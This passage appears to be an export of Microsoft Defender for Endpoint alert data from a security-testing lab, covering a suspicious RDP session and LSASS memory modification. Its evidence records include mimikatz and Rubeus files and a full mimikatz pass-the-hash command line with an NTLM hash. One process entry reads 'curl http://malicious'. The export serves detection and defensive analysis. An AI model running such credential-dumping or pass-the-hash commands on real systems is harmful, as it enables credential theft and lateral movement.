"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:17:33.69Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:14:30.1674201Z",
"processId": 9008,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:17:34.3766667Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:14:08.7063722Z",
"processId": 5592,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:19:04.4966667Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:16:27.1164549Z",
"processId": 7888,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:20:59.5533333Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:16:05.8519522Z",
"processId": 6764,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:23:12.2066667Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:22:22.878082Z",
"processId": 8064,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:28:04.9Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:24:45.5696509Z",
"processId": 6984,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:33:30.69Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:31:41.876943Z",
"processId": 9664,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:33:31.7733333Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:31:20.3075634Z",
"processId": 456,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:36:18.9733333Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:33:42.4457797Z",
"processId": 9656,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:36:19.78Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:33:21.1761631Z",
"processId": 7748,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638001153088730569_1093802277
|
0cf8fa01-8fbb-4476-a8df-1514deded2ec
| 486
|
MicrosoftDefenderForEndpoint
|
2022-09-30T06:15:08.8730773Z
|
2022-11-19T01:35:42.7033333Z
|
2022-10-01T01:36:00.5066667Z
|
2022-09-30T06:10:55.1361741Z
|
2022-09-30T06:11:51.5727687Z
|
Suspicious RDP session
|
A combination of several suspicious RDP session activities has been detected in this device. Attackers might be attempting to establish a foothold in the environment by using various reconnaissance and persistence methods, then evade detection by tampering with and turning off security features to complete their objectives.
|
SuspiciousActivity
|
Resolved
|
High
| 20
|
TerminatedBySystem
|
TruePositive
|
SecurityTesting
|
WindowsDefenderAtp
|
e3270960-77a9-4f2b-a6ba-ea6a9d5e86d8
|
msftadmin@msdxv2.m365dpoc.com
| null | null |
[
"T1003",
"T1021.001",
"T1555",
"T1558.003"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "rnd.local",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "High",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] |
[
{
"aadUserId": null,
"accountName": "MSDXV2-Win10V$",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV2",
"entityType": "User",
"evidenceCreationTime": "2022-09-30T06:15:08.9233333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-09-30T06:15:08.9233333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-09-30T06:15:08.9233333Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": "Timed out because a pending action was not approved,Timed out because a pending action was not approved",
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-09-30T06:15:08.9233333Z",
"fileName": "Rubeus.exe",
"filePath": "C:\\M365DAttack\\Rubeus",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": "Timed out because a pending action was not approved,Timed out because a pending action was not approved",
"sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7",
"sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-09-30T06:15:08.9233333Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Ip",
"evidenceCreationTime": "2022-09-30T06:15:08.9233333Z",
"fileName": null,
"filePath": null,
"ipAddress": "118.200.50.235",
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-09-30T06:15:08.9233333Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": "2022-08-23T12:17:37.8693453Z",
"parentProcessFileName": "explorer.exe",
"parentProcessFilePath": "C:\\Windows",
"parentProcessId": 4668,
"processCommandLine": "\"powershell.exe\" ",
"processCreationTime": "2022-09-30T06:11:13.210308Z",
"processId": 4064,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-09-30T06:21:57.3633333Z",
"fileName": "lsass.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-08-23T12:15:53.4494427Z",
"parentProcessFileName": "wininit.exe",
"parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32",
"parentProcessId": 532,
"processCommandLine": "lsass.exe",
"processCreationTime": "2022-08-23T12:15:53.5364289Z",
"processId": 604,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "0fb26350106c9bdd196d4e7d01eb30007663687c",
"sha256": "bbc83e4759d4b82bad31e371ad679aa414c72273bf97cee5aed8337ed8a4d79f",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-11-18T05:10:38.28Z
|
Suspicious
|
Active
|
jeff
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
|
4f4970c3545972fea2bc1984d597fc810e6321e0
|
25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369
|
net.exe
|
C:\Windows\System32
| 4,744
|
curl http://malicious
|
2022-11-18T05:09:25.177958Z
| 4,976
|
2022-11-18T05:04:12.7150402Z
|
powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0
|
Detected
|
c7e147cb0eb3534a4dcea5acb8e61c933713b145
|
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-11-21T02:17:48.5166667Z
|
Suspicious
|
None
|
analyst
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1111
|
89b6fc86-af84-47b2-a72d-325362598b2c
|
ronhd@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
da638045933184312045_2052783927
|
c4dc252d-d37b-491f-866a-70d480e88165
| 765
|
MicrosoftDefenderForEndpoint
|
2022-11-21T02:08:38.4312196Z
|
2022-11-21T02:39:52.7233333Z
| null |
2022-11-21T02:02:24.517617Z
|
2022-11-21T02:34:24.5130039Z
|
LSASS process memory modified
|
The Local Security Authority Subsystem Service (LSASS) process enforces security policy by verifying user logons and password changes. Attackers might modify LSASS memory to bypass security mechanisms or circumvent legitimate checks.
|
CredentialAccess
|
New
|
High
| null |
UnsupportedAlertType
| null | null |
WindowsDefenderAtp
|
eb025de4-0ad4-4fcb-8ce2-711ee3956107
| null | null | null |
[
"T1003",
"T1003.001",
"T1547.005"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "Low",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] |
[
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:08:38.4733333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:08:38.4733333Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe dir \\\\msdxv2-win10b\\C$ >> C:\\M365DAttack\\Step3-PasstheHash.txt\\\"\" exit",
"processCreationTime": "2022-11-21T02:01:38.4465922Z",
"processId": 3516,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:12:45.38Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe dir \\\\msdxv2-win10b\\C$ >> C:\\M365DAttack\\Step3-PasstheHash.txt\\\"\" exit",
"processCreationTime": "2022-11-21T02:05:25.5028748Z",
"processId": 6412,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:15:29.7466667Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe dir \\\\msdxv2-win10b\\C$ >> C:\\M365DAttack\\Step3-PasstheHash.txt\\\"\" exit",
"processCreationTime": "2022-11-21T02:13:40.8687547Z",
"processId": 3308,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:18:45.87Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe dir \\\\msdxv2-win10b\\C$ >> C:\\M365DAttack\\Step3-PasstheHash.txt\\\"\" exit",
"processCreationTime": "2022-11-21T02:11:22.339311Z",
"processId": 11040,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:22:45.0266667Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
